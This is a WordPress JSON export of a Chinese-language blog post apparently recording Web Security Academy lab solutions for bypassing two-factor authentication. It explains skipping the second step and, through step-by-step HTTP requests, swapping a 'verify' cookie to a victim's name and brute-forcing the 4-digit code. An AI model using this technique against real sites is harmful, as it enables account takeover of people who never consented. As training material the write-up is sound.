{"id":1527,"date":"2023-04-13T17:04:00","date_gmt":"2023-04-13T09:04:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1527"},"modified":"2024-04-27T08:44:28","modified_gmt":"2024-04-27T00:44:28","slug":"2fa-bypass","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1527","title":{"rendered":"bypass 2FA"},"content":{"rendered":"\n<p>\u8a31\u591a\u7db2\u7ad9\u8981\u6c42\u4f7f\u7528\u8005\u4f7f\u75282FA( multi-factor authentication,\u96d9\u56e0\u5b50\u8a8d\u8b49)\u4f86\u8b49\u660e\u8eab\u4efd\u3002\u80fd\u540c\u6642\u53d6\u5f97\u5bc6\u78bc\u8207\u5916\u90e8\u4f86\u6e90\u7684\u9a57\u8b49\u78bc\u7684\u53ef\u80fd\u6027\u6975\u4f4e\uff0c\u56e0\u6b642FA\u986f\u7136\u6bd4\u55ae\u56e0\u5b50\u8eab\u4efd\u9a57\u8b49\u66f4\u5b89\u5168\u3002\u4f46\u662f\uff0c\u5982\u679c2FA\u8a2d\u8a08\u4e0d\u826f\uff0c\u5c31\u53ef\u4ee5\u5229\u7528\u7f3a\u9677\u7e5e\u904e\u9019\u7a2e\u8a8d\u8b49\u6a5f\u5236\u3002<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>\u5e38\u898b\u7684\u5b89\u5168\u554f\u984c\u5982\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u53ef\u76f4\u63a5\u8df3\u904e\u9a57\u8b49\u672a\u6aa2\u67e5<\/li>\n\n\n\n<li>\u672a\u7d81\u5b9a\u524d\u5f8c2\u500b\u9a57\u8b49\u7684\u72c0\u614b<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-wide\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">\u53ef\u76f4\u63a5\u8df3\u904e\u9a57\u8b49\u672a\u6aa2\u67e5<\/h2>\n\n\n\n<p>\u4f7f\u7528\u8005\u53ef\u4ee5\u7121\u8996\u9a57\u8b49\u6d41\u7a0b\uff0c\u76f4\u63a5\u8df3\u904e\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<p>\u5047\u8a2d\u67d0\u7db2\u7ad9\u767b\u5165\u6d41\u7a0b\u5982\u4e0b<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5728login\u8f38\u5165\u5e33\u5bc6\uff0c\u9a57\u8b49\u6210\u529f\u5f8c\u767c\u90014\u4f4d\u6578\u9a57\u8b49\u78bc\u5230\u4fe1\u7bb1<\/li>\n\n\n\n<li>\u770b\u4fe1\u7bb1\u67e5\u95b1\u9a57\u8b49\u78bc\u5f8c\uff0c\u8f38\u51654\u4f4d\u6578\u9a57\u8b49\u78bc\uff0c\u9a57\u8b49\u6210\u529f\u5f8c\u5230\u7b2c3\u6b65<\/li>\n\n\n\n<li>\u8df3\u8f49\u5230my-account\uff0c\u6210\u529f\u5b58\u53d6<\/li>\n<\/ol>\n\n\n\n<p>\u4f46\u56e0\u70ba\u767c\u73fe\u76ee\u6a19\u7db2\u7ad9\u5b58\u5728\u6f0f\u6d1e\uff0c\u6c92\u6709\u6aa2\u67e5\u7b2c\u4e8c\u968e\u6bb5\u6709\u7121\u9a57\u8b49\u6210\u529f\u5c31\u6388\u6b0a\uff0c\u6240\u4ee5\u5728\u7b2c\u4e00\u968e\u6bb5login\u8f38\u5165\u5e33\u5bc6\u9a57\u8b49\u6210\u529f\u5f8c\uff0c\u8df3\u904e\u7b2c2\u968e\u6bb5\u9a57\u8b49\uff0c\u76f4\u63a5\u4eba\u5de5\u8a2a\u554fmy-account\u5c31\u53ef\u4ee5\u5b58\u53d6\uff0c\u6d41\u7a0b\u5982\u4e0b<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>\u5728login\u8f38\u5165\u5e33\u5bc6\uff0c\u9a57\u8b49\u6210\u529f\u5f8c\u767c\u90014\u4f4d\u6578\u9a57\u8b49\u78bc\u5230\u4fe1\u7bb1<\/li>\n\n\n\n<li>\u76f4\u63a5\u8a2a\u554fmy-account\uff0c\u6210\u529f\u5b58\u53d6<\/li>\n<\/ol>\n\n\n\n<p>Lab: 2FA simple bypass<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u672a\u7d81\u5b9a\u524d\u5f8c2\u500b\u9a57\u8b49\u7684\u72c0\u614b<\/h2>\n\n\n\n<p>\u7576\u4f7f\u7528\u8005\u5b8c\u6210\u521d\u59cb\u767b\u5165\u6b65\u9a5f\u5f8c\uff0c\u7db2\u7ad9\u6c92\u6709\u5145\u5206\u9a57\u8b49\u76f8\u540c\u4f7f\u7528\u8005\u662f\u5426\u6b63\u5728\u5b8c\u6210\u7b2c\u4e8c\u6b65\uff0c\u8209\u4f8b\u5982\u4e0b\u3002<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u67d0\u7db2\u7ad9\u6b63\u5e38\u767b\u5165\u6d41\u7a0b<\/h3>\n\n\n\n<p>1.\u8f38\u5165\u5e33\u5bc6\u5f8c\u9001\u51fa\u7b2c\u4e00\u968e\u6bb5\u9a57\u8b49\u8acb\u6c42\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>##################### request #####################\nPOST \/login HTTP\/1.1\n...omit...\nCookie: verify=wiener; session=IUuj0LezTMY4odic9B9ZQLNvjMAHDwZY\ncsrf=TntnwhEDOc994CUysx3mn4pDoBXkfQ7n&amp;username=wiener&amp;password=peter\n\n##################### response #####################\nHTTP\/1.1 302 Found\nLocation: \/login2\nSet-Cookie: verify=wiener; Path=\/; HttpOnly\nSet-Cookie: session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj; Path=\/; Secure; HttpOnly\n...omit...<\/code><\/pre>\n\n\n\n<p>2.\u7b2c\u4e00\u968e\u6bb5\u9a57\u8b49\u901a,\u958b\u59cb\u7b2c\u4e8c\u968e\u6bb5\u7684\u9a57\u8b49\u78bc\u8a8d\u8b49<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>##################### request #####################\nGET \/login2 HTTP\/1.1\n...omit...\nCookie: verify=wiener; session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj\n\n##################### response #####################\n...omit...\n&lt;input required type=\"hidden\" name=\"csrf\" value=\"m7AWALsEaobpz2Ojod3axD8EmwLZPxpe\">\n&lt;label>Please enter your 4-digit security code&lt;\/label>\n...omit...<\/code><\/pre>\n\n\n\n<p>3.\u5728\u7b2c\u4e8c\u968e\u6bb5\u8f38\u5165\u9a57\u8b49\u78bc<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>##################### request #####################\nPOST \/login2 HTTP\/1.1\n...omit...\nCookie: verify=wiener; session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj\ncsrf=m7AWALsEaobpz2Ojod3axD8EmwLZPxpe&amp;mfa-code=1234\n\n##################### response #####################\nHTTP\/1.1 302 Found\nLocation: https:\/\/ac461f3e1e146af180ef926e00ee0031.web-security-academy.net\nSet-Cookie: session=JOVfvwab1OzAOSmo50ebfKHRhkCFSbDn; Path=\/; Secure; HttpOnly\n...omit...<\/code><\/pre>\n\n\n\n<p>4.\u7b2c\u4e8c\u968e\u6bb5\u9a57\u8b49\u901a,\u8fd4\u56de\u9996\u9801<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/ HTTP\/1.1\n...omit...\nCookie: verify=wiener; session=JOVfvwab1OzAOSmo50ebfKHRhkCFSbDn<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6f0f\u6d1e\u767c\u73fe<\/h3>\n\n\n\n<p>\u5206\u6790\u7db2\u7ad9\u7684\u7b2c\u4e8c\u968e\u6bb5\u9a57\u8b49\u6642\u767c\u73fe\u5728cookie\u7684\u5730\u65b9\uff0c\u53ef\u4ee5\u628averify\u6539\u70ba\u53d7\u5bb3\u8005\u505a\u7533\u8acb<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/login2 HTTP\/1.1\n...omit...\nCookie: verify=victim; session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj<\/code><\/pre>\n\n\n\n<p>\u4e26\u7528\u53d7\u5bb3\u8005\u7684\u9a57\u8b49\u78bc\u9001\u51fa\u8acb\u6c42\u505a\u9a57\u8b49\uff0c\u4e00\u65e6\u9a57\u8b49\u6210\u529f\uff0c\u5c31\u7b49\u540c\u662f\u7528victim\u8eab\u4efd\u767b\u5165\uff0c\u63db\u53e5\u8a71\u8aaa\u7b2c\u4e00\u968e\u6bb5\u4e0d\u7528victim\u7684\u5bc6\u78bc\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/login2 HTTP\/1.1\n...omit...\nCookie: verify=victim; session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj\ncsrf=m7AWALsEaobpz2Ojod3axD8EmwLZPxpe&amp;mfa-code=1234<\/code><\/pre>\n\n\n\n<p>\u4e3b\u8981\u662f\u56e0\u70ba\u6c92\u6709\u505a\u597d\u7d81\u5b9a\uff0c\u56e0\u6b64\u5728\u7b2c\u4e00\u968e\u6bb5\u5b8c\u9a57\u8b49\u5b8c\u5f8c\uff0c\u7b2c\u4e8c\u968e\u6bb5\u5c31\u53ef\u4ee5\u6539\u6210\u5176\u4ed6\u4eba\u7684\u5e33\u6236\uff0c\u4e26\u7528\u7206\u529b\u7834\u89e34\u4f4d\u6578\u5bc6\u78bc<\/p>\n\n\n\n<p> <\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u653b\u64ca\u6d41\u7a0b<\/h3>\n\n\n\n<p>1 \u5148\u4f7f\u7528\u5df1\u77e5\u5e33\u5bc6\u901a\u904e\u7b2c\u4e00\u968e\u6bb5\u9a57\u8b49<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/login HTTP\/1.1\n...omit...\nCookie: verify=wiener; session=IUuj0LezTMY4odic9B9ZQLNvjMAHDwZY\ncsrf=TntnwhEDOc994CUysx3mn4pDoBXkfQ7n&amp;username=wiener&amp;password=peter<\/code><\/pre>\n\n\n\n<p>2.\u7b2c\u4e00\u968e\u6bb5\u9a57\u8b49\u5b8c\u6210\u5f8c\uff0c\u6703\u958b\u59cb\u6e96\u5099\u7b2c\u4e8c\u968e\u6bb5\u9a57\u8b49\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/login2 HTTP\/1.1\n...omit...\nCookie: verify=wiener; session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj<\/code><\/pre>\n\n\n\n<p>3.\u5c07\u4e0a\u8ff0\u8acb\u6c42\u7684verify\u6539\u70ba\u53d7\u5bb3\u8005carlos \u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/login2 HTTP\/1.1\n...omit...\nCookie: <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">verify=carlos<\/mark>; session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj<\/code><\/pre>\n\n\n\n<p>4.\u900f\u904e\u7206\u529b\u5bc6\u78bc\u7834\u89e3\u9001\u51fa\u7b2c\u4e8c\u968e\u6bb5\u9a57\u8b49\u78bc, \u53ef\u4f7f\u7528intruder\u5c07\u8acb\u6c42\u8abf\u6210\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>POST \/login2 HTTP\/1.1\n...omit...\nCookie:<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"> verify=carlos<\/mark>; session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj\ncsrf=m7AWALsEaobpz2Ojod3axD8EmwLZPxpe&amp;mfa-code=$brute force$<\/code><\/pre>\n\n\n\n<p>5.\u4e00\u65e6\u7206\u529b\u5bc6\u78bc\u7834\u89e3\u6210\u529f\uff0c\u6703302\u91cd\u5c0e\u5411<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>##################### request #####################\nPOST \/login2 HTTP\/1.1\n...omit...\nCookie: <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">verify=carlos<\/mark>; session=6TmJOTFVO6E4QKSqbXEnKazco8qiDWyj\ncsrf=m7AWALsEaobpz2Ojod3axD8EmwLZPxpe&amp;mfa-code=9527\n\n##################### response #####################\nHTTP\/1.1 302 Found\nLocation: https:\/\/ac461f3e1e146af180ef926e00ee0031.web-security-academy.net\nSet-Cookie: session=ImHQqLtWzTioShZNqf6LXkSVaj2rUiBy; Path=\/; Secure; HttpOnly\n...omit...<\/code><\/pre>\n\n\n\n<p>6.\u91cd\u5c0e\u5411\u5230carlos\u7684\u9801\u9762\uff0c\u5165\u4fb5\u6210\u529f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>request\n\tGET \/my-account?id=carlos HTTP\/1.1\n\t...omit...\n\tCookie: verify=carlos; session=ImHQqLtWzTioShZNqf6LXkSVaj2rUiBy<\/code><\/pre>\n\n\n\n<p>Lab: 2FA broken logic<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u8a31\u591a\u7db2\u7ad9\u8981\u6c42\u4f7f\u7528\u8005\u4f7f\u75282FA( multi-factor authentication,\u96d9\u56e0\u5b50\u8a8d\u8b49)\u4f86\u8b49\u660e\u8eab\u4efd\u3002\u80fd\u540c\u6642\u53d6\u5f97\u5bc6\u78bc\u8207\u5916\u90e8\u4f86\u6e90\u7684\u9a57\u8b49\u78bc\u7684\u53ef\u80fd\u6027\u6975\u4f4e\uff0c\u56e0\u6b642FA\u986f\u7136\u6bd4\u55ae\u56e0\u5b50\u8eab\u4efd\u9a57\u8b49\u66f4\u5b89\u5168\u3002\u4f46\u662f\uff0c\u5982\u679c2FA\u8a2d\u8a08\u4e0d\u826f\uff0c\u5c31\u53ef\u4ee5\u5229\u7528\u7f3a\u9677\u7e5e\u904e\u9019\u7a2e\u8a8d\u8b49\u6a5f\u5236\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[],"class_list":["post-1527","post","type-post","status-publish","format-standard","hentry","category-logic-vulnerabilities"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1527","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1527"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1527\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1527"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1527"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1527"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}